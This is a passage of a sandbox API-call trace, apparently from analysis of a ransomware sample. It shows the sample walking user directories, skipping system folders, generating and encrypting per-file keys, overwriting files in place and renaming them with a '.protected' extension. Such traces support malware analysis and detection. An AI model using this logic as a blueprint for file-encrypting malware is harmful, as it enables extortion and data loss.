returned 0x0 [0087.455] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.455] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0087.455] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0087.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.456] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\..") returned 63 [0087.456] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.456] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.456] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.456] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0087.456] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0087.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.456] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 77 [0087.456] lstrcmpW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0087.456] lstrcmpW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0087.456] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned 79 [0087.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0087.456] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.456] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.456] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.456] lstrcmpiW 
(lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.456] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.456] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.") returned 79 [0087.456] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.456] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0087.456] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.456] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0087.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0087.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.457] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.457] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.457] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.457] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\..") returned 80 [0087.457] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0087.457] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.457] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.457] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.457] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0087.457] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0087.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.457] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Windows") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Program Files") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="Program Files (x86)") returned -1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="$Recycle.bin") returned 1 [0087.457] lstrcmpiW (lpString1="Content", lpString2="System Volume Information") returned -1 [0087.457] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 85 [0087.457] lstrcmpW (lpString1="Content", lpString2=".") returned 1 [0087.457] lstrcmpW (lpString1="Content", lpString2="..") returned 1 [0087.457] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned 87 [0087.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0087.458] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.") returned 87 [0087.458] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.458] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0087.458] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0087.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\..") returned 88 [0087.458] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.458] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.458] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0087.458] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0087.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0087.458] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Windows") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="Program Files (x86)") returned -1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="$Recycle.bin") returned 1 [0087.458] lstrcmpiW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="System Volume Information") returned -1 [0087.458] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrIW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".protected") returned 0x0 [0087.459] lstrcmpW (lpString1="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpString2="RESTORE_FILES.txt") returned -1 [0087.459] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.459] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.459] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".rar") returned 0x0 [0087.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 151 [0087.459] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".zip") returned 0x0 [0087.459] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1d7, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1d7, lpOverlapped=0x0) returned 1 [0087.460] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.460] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.461] CloseHandle (hObject=0x150) returned 1 [0087.461] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected") returned 161 [0087.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.protected")) returned 1 [0087.463] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.463] lstrcmpiW 
(lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Windows") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="Program Files (x86)") returned -1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="$Recycle.bin") returned 1 [0087.463] lstrcmpiW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="System Volume Information") returned -1 [0087.463] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.463] StrStrIW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".protected") returned 0x0 [0087.463] lstrcmpW (lpString1="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpString2="RESTORE_FILES.txt") returned -1 [0087.463] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.463] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".txt") returned 0x0 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".rar") returned 0x0 [0087.473] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned 151 [0087.473] StrStrW (lpFirst="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpSrch=".zip") returned 0x0 [0087.473] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x561, lpOverlapped=0x0) returned 1 [0087.530] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.530] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x561, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x561, lpOverlapped=0x0) returned 1 [0087.531] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.531] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, 
lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0087.531] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0087.531] CloseHandle (hObject=0x150) returned 1 [0087.531] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected") returned 161 [0087.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875.protected")) returned 1 [0087.532] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Windows") returned -1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files") returned -1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="Program Files (x86)") returned -1 [0087.532] lstrcmpiW 
(lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="$Recycle.bin") returned 1 [0087.532] lstrcmpiW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="System Volume Information") returned -1 [0087.532] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned 151 [0087.532] StrStrIW (lpFirst="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpSrch=".protected") returned 0x0 [0087.532] lstrcmpW (lpString1="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", lpString2="RESTORE_FILES.txt") returned -1 [0087.532] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0087.532] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0087.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js 